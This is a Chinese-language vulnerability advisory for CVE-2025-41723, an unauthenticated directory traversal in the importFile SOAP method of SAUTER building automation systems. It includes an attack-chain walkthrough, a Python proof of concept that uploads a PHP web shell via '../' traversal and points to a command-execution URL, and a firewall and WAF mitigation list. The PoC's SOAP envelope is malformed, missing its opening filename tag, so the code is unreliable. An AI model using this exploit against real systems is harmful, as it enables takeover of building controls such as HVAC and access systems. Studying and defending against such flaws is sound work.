CVE-2025-41723：SAUTER importFile SOAP方法目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-41723

漏洞类型

目录遍历（Path Traversal）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SAUTER 楼宇自动化系统（Building Automation System）

漏洞概述

CVE-2025-41723是SAUTER楼宇自动化系统中存在的一个高危目录遍历漏洞，CVSS评分高达9.8，属于严重级别。该漏洞存在于SAUTER产品的importFile SOAP Web服务方法中，由于服务端未对用户传入的文件路径进行充分的校验和过滤，攻击者可以通过构造包含特殊路径序列（如../）的文件路径，绕过系统原有的路径限制机制。

该漏洞由CERT@VDE（[email protected]）发现并报告，于2025年10月22日正式披露。由于SAUTER楼宇自动化系统广泛应用于商业建筑、工业设施的暖通空调（HVAC）、照明控制、能源管理等关键基础设施中，该漏洞的影响范围可能涉及大量建筑物控制系统。

漏洞利用条件极为宽松：攻击者无需任何身份认证（PR:N），无需用户交互（UI:N），仅需通过网络（AV:N）即可发起攻击。攻击复杂度低（AC:L），一旦成功利用，攻击者可将任意文件上传至系统任意位置，对系统的机密性、完整性和可用性均造成严重影响。攻击者可能利用此漏洞植入恶意软件、篡改控制逻辑、上传Web Shell，甚至完全控制楼宇自动化系统，进而影响建筑物的正常运行、窃取敏感数据或实施物理层面的破坏。

技术细节

SAUTER楼宇自动化系统通过SOAP（Simple Object Access Protocol）Web服务提供远程管理接口，其中importFile方法用于将配置文件、固件更新或其他资源文件导入到系统中。在正常情况下，该方法应当对传入的目标路径进行严格的校验，确保文件只能被写入到系统预设的安全目录内。

然而，在存在漏洞的版本中，importFile方法未对用户可控的文件路径参数进行充分的规范化处理和过滤。攻击者可以通过在路径中插入目录遍历序列（如"../"或"..\\"），绕过服务端的安全检查机制。例如，攻击者可以构造如下SOAP请求，将恶意文件上传至系统关键目录或Web可访问目录：

攻击者通过精心构造SOAP请求体中的文件路径字段（如filePath或destination参数），利用路径遍历序列突破目录沙箱限制。服务端在处理文件写入时直接使用了未经验证的用户输入路径，导致文件被写入到攻击者指定的任意位置。攻击者可将Web Shell上传至Web服务器目录获取远程命令执行权限，或将恶意脚本上传至系统启动目录实现持久化控制。由于整个过程无需认证且攻击复杂度极低，该漏洞极易被大规模利用，对受影响的建筑设施构成严重威胁。

攻击链分析

STEP 1

步骤1：信息收集与目标识别

攻击者通过网络扫描或Shodan等搜索引擎发现暴露在公网上的SAUTER楼宇自动化系统SOAP接口，确认目标系统的importFile方法可访问。

STEP 2

步骤2：构造恶意SOAP请求

攻击者构造包含目录遍历序列（如../../../）的SOAP请求，在filename或path参数中指定目标写入路径，并在fileData中嵌入恶意载荷（如Web Shell）。

STEP 3

步骤3：发送未认证请求

攻击者直接向importFile SOAP端点发送恶意请求，由于漏洞无需认证（PR:N），服务端直接处理并执行文件写入操作。

STEP 4

步骤4：绕过路径限制

服务端未对路径进行规范化校验，目录遍历序列成功绕过安全限制，恶意文件被写入到攻击者指定的任意位置（如Web根目录、系统启动目录等）。

STEP 5

步骤5：获取控制权限

攻击者通过访问上传的Web Shell或恶意脚本获取对楼宇自动化系统的远程命令执行权限，进而控制HVAC、照明、门禁等关键系统。

STEP 6

步骤6：持久化与横向移动

攻击者在系统中植入后门，实现持久化控制，并尝试在建筑网络内进行横向移动，访问其他敏感系统或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-41723 PoC - SAUTER importFile SOAP Method Directory Traversal
# Exploits the importFile SOAP method to upload files to arbitrary locations

import requests
from xml.sax.saxutils import escape

TARGET_URL = "https://target-sauter-system/soap/importFile"
# Traversal payload to escape the restricted upload directory
# e.g., upload a web shell to the web root
MALICIOUS_FILENAME = "../../../../var/www/html/shell.php"

# Malicious PHP web shell content
FILE_CONTENT = """<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""

# Construct SOAP envelope with directory traversal in filename
soap_envelope = f"""<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <importFile xmlns="http://schemas.sauter.com/building/automation">
      {escape(MALICIOUS_FILENAME)}</filename>
      <fileData>{escape(FILE_CONTENT)}</fileData>
    </importFile>
  </soapenv:Body>
</soapenv:Envelope>"""

headers = {
    "Content-Type": "text/xml; charset=UTF-8",
    "SOAPAction": '"importFile"'
}

# Send the malicious SOAP request - no authentication required
response = requests.post(TARGET_URL, data=soap_envelope, headers=headers)

if response.status_code == 200:
    print(f"[+] File uploaded successfully via path traversal!")
    print(f"[+] Access web shell at: {TARGET_URL.rsplit('/', 1)[0]}/shell.php?cmd=id")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")

影响范围

SAUTER楼宇自动化系统受影响版本（具体版本请参考官方CSAF公告 vde-2025-060）

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）通过网络防火墙或ACL限制SAUTER系统SOAP接口的访问范围，仅允许可信管理主机访问；2）如果系统支持，临时禁用importFile SOAP方法或相关Web服务；3）部署WAF（Web应用防火墙）规则，检测和阻断包含目录遍历序列（../）的SOAP请求；4）对系统关键目录进行文件完整性监控，及时发现异常文件写入；5）将楼宇自动化系统网络与企业网络及互联网进行严格隔离。